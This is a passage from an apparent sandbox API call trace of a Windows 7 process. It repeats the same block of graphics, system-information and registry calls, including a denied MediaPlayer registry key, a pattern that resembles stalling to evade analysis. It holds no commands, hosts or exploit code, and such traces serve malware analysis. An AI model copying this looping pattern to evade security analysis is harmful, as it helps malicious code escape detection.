hrgnSrc1=0xb90401d6, hrgnSrc2=0xbb0401d3, iMode=4) returned 2 [0087.896] CreateSolidBrush (color=0xff) returned 0x2100d7c [0087.896] CreateSolidBrush (color=0xff0000) returned 0x1100d7f [0087.896] DeleteObject (ho=0x1100d7f) returned 1 [0087.896] DeleteObject (ho=0xbb0401d3) returned 1 [0087.896] DeleteObject (ho=0xb90401d6) returned 1 [0087.896] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.896] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.896] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.896] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.896] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.896] BeginPath (hdc=0x0) returned 0 [0087.896] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.896] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.896] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.896] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.896] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.896] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.896] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.896] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.896] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401d3 [0087.896] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401d6 [0087.896] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d80 [0087.896] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d81 [0087.896] CombineRgn (hrgnDst=0x1040d80, hrgnSrc1=0xbc0401d3, hrgnSrc2=0xba0401d6, iMode=1) returned 1 [0087.896] CombineRgn (hrgnDst=0x1040d81, hrgnSrc1=0xbc0401d3, hrgnSrc2=0xba0401d6, iMode=4) returned 2 [0087.896] CreateSolidBrush (color=0xff) returned 0x2100d7f [0087.896] CreateSolidBrush (color=0xff0000) returned 0x1100d82 [0087.897] DeleteObject (ho=0x1100d82) returned 1 [0087.897] DeleteObject (ho=0xba0401d6) returned 1 [0087.897] DeleteObject (ho=0xbc0401d3) returned 1 [0087.897] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.897] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.897] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.897] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.897] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.897] BeginPath (hdc=0x0) returned 0 [0087.897] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.897] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.897] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.897] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.897] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.897] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.897] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.897] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.897] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401d6 [0087.897] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401d3 [0087.897] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d83 [0087.897] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d84 [0087.897] CombineRgn (hrgnDst=0x1040d83, hrgnSrc1=0xbb0401d6, hrgnSrc2=0xbd0401d3, iMode=1) returned 1 [0087.897] CombineRgn (hrgnDst=0x1040d84, hrgnSrc1=0xbb0401d6, hrgnSrc2=0xbd0401d3, iMode=4) returned 2 [0087.897] CreateSolidBrush (color=0xff) returned 0x2100d82 [0087.897] CreateSolidBrush (color=0xff0000) returned 0x1100d85 [0087.897] DeleteObject (ho=0x1100d85) returned 1 [0087.897] DeleteObject (ho=0xbd0401d3) returned 1 [0087.897] DeleteObject (ho=0xbb0401d6) returned 1 [0087.897] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.897] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.897] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.897] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.897] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.897] BeginPath (hdc=0x0) returned 0 [0087.897] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.897] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.897] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.897] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.897] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.898] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.898] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.898] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.898] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401d3 [0087.898] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401d6 [0087.898] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d86 [0087.898] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d87 [0087.898] CombineRgn (hrgnDst=0x1040d86, hrgnSrc1=0xbe0401d3, hrgnSrc2=0xbc0401d6, iMode=1) returned 1 [0087.898] CombineRgn (hrgnDst=0x1040d87, hrgnSrc1=0xbe0401d3, hrgnSrc2=0xbc0401d6, iMode=4) returned 2 [0087.898] CreateSolidBrush (color=0xff) returned 0x2100d85 [0087.898] CreateSolidBrush (color=0xff0000) returned 0x1100d88 [0087.898] DeleteObject (ho=0x1100d88) returned 1 [0087.898] DeleteObject (ho=0xbc0401d6) returned 1 [0087.898] DeleteObject (ho=0xbe0401d3) returned 1 [0087.898] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.898] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.898] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.898] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.898] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.898] BeginPath (hdc=0x0) returned 0 [0087.898] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.898] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.898] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.898] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.898] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.898] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.898] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.898] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.898] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401d6 [0087.898] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401d3 [0087.898] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d89 [0087.899] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8a [0087.899] CombineRgn (hrgnDst=0x1040d89, hrgnSrc1=0xbd0401d6, hrgnSrc2=0xbf0401d3, iMode=1) returned 1 [0087.899] CombineRgn (hrgnDst=0x1040d8a, hrgnSrc1=0xbd0401d6, hrgnSrc2=0xbf0401d3, iMode=4) returned 2 [0087.899] CreateSolidBrush (color=0xff) returned 0x2100d88 [0087.899] CreateSolidBrush (color=0xff0000) returned 0x1100d8b [0087.899] DeleteObject (ho=0x1100d8b) returned 1 [0087.899] DeleteObject (ho=0xbf0401d3) returned 1 [0087.899] DeleteObject (ho=0xbd0401d6) returned 1 [0087.899] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.899] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.899] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.899] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.899] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.899] BeginPath (hdc=0x0) returned 0 [0087.899] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.899] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.899] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.899] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.899] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.899] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.899] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.899] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.899] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401d3 [0087.899] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401d6 [0087.899] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8c [0087.899] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8d [0087.899] CombineRgn (hrgnDst=0x1040d8c, hrgnSrc1=0xc00401d3, hrgnSrc2=0xbe0401d6, iMode=1) returned 1 [0087.899] CombineRgn (hrgnDst=0x1040d8d, hrgnSrc1=0xc00401d3, hrgnSrc2=0xbe0401d6, iMode=4) returned 2 [0087.899] CreateSolidBrush (color=0xff) returned 0x2100d8b [0087.899] CreateSolidBrush (color=0xff0000) returned 0x1100d8e [0087.899] DeleteObject (ho=0x1100d8e) returned 1 [0087.899] DeleteObject (ho=0xbe0401d6) returned 1 [0087.899] DeleteObject (ho=0xc00401d3) returned 1 [0087.899] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.899] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.899] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.899] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.900] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.900] BeginPath (hdc=0x0) returned 0 [0087.900] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.900] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.900] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.900] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.900] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.900] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.900] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401d6 [0087.900] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401d3 [0087.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d8f [0087.900] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d90 [0087.900] CombineRgn (hrgnDst=0x1040d8f, hrgnSrc1=0xbf0401d6, hrgnSrc2=0xc10401d3, iMode=1) returned 1 [0087.900] CombineRgn (hrgnDst=0x1040d90, hrgnSrc1=0xbf0401d6, hrgnSrc2=0xc10401d3, iMode=4) returned 2 [0087.900] CreateSolidBrush (color=0xff) returned 0x2100d8e [0087.900] CreateSolidBrush (color=0xff0000) returned 0x1100d91 [0087.900] DeleteObject (ho=0x1100d91) returned 1 [0087.900] DeleteObject (ho=0xc10401d3) returned 1 [0087.900] DeleteObject (ho=0xbf0401d6) returned 1 [0087.900] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.900] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.900] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.900] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.900] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.900] BeginPath (hdc=0x0) returned 0 [0087.900] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.900] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.900] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.900] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.900] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.900] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.900] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.901] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401d3 [0087.901] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401d6 [0087.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d92 [0087.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d93 [0087.901] CombineRgn (hrgnDst=0x1040d92, hrgnSrc1=0xc20401d3, hrgnSrc2=0xc00401d6, iMode=1) returned 1 [0087.901] CombineRgn (hrgnDst=0x1040d93, hrgnSrc1=0xc20401d3, hrgnSrc2=0xc00401d6, iMode=4) returned 2 [0087.901] CreateSolidBrush (color=0xff) returned 0x2100d91 [0087.901] CreateSolidBrush (color=0xff0000) returned 0x1100d94 [0087.901] DeleteObject (ho=0x1100d94) returned 1 [0087.901] DeleteObject (ho=0xc00401d6) returned 1 [0087.901] DeleteObject (ho=0xc20401d3) returned 1 [0087.901] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.901] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.901] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.901] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.901] BeginPath (hdc=0x0) returned 0 [0087.901] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.901] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.901] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.901] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.901] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.901] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.901] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.901] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401d6 [0087.901] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401d3 [0087.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d95 [0087.901] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d96 [0087.901] CombineRgn (hrgnDst=0x1040d95, hrgnSrc1=0xc10401d6, hrgnSrc2=0xc30401d3, iMode=1) returned 1 [0087.901] CombineRgn (hrgnDst=0x1040d96, hrgnSrc1=0xc10401d6, hrgnSrc2=0xc30401d3, iMode=4) returned 2 [0087.901] CreateSolidBrush (color=0xff) returned 0x2100d94 [0087.901] CreateSolidBrush (color=0xff0000) returned 0x1100d97 [0087.901] DeleteObject (ho=0x1100d97) returned 1 [0087.901] DeleteObject (ho=0xc30401d3) returned 1 [0087.901] DeleteObject (ho=0xc10401d6) returned 1 [0087.901] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.901] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.902] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.902] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.902] BeginPath (hdc=0x0) returned 0 [0087.902] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.902] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.902] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.902] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.902] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.902] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.902] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401d3 [0087.902] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401d6 [0087.902] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d98 [0087.902] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d99 [0087.902] CombineRgn (hrgnDst=0x1040d98, hrgnSrc1=0xc40401d3, hrgnSrc2=0xc20401d6, iMode=1) returned 1 [0087.902] CombineRgn (hrgnDst=0x1040d99, hrgnSrc1=0xc40401d3, hrgnSrc2=0xc20401d6, iMode=4) returned 2 [0087.902] CreateSolidBrush (color=0xff) returned 0x2100d97 [0087.902] CreateSolidBrush (color=0xff0000) returned 0x1100d9a [0087.902] DeleteObject (ho=0x1100d9a) returned 1 [0087.902] DeleteObject (ho=0xc20401d6) returned 1 [0087.902] DeleteObject (ho=0xc40401d3) returned 1 [0087.902] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.902] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, 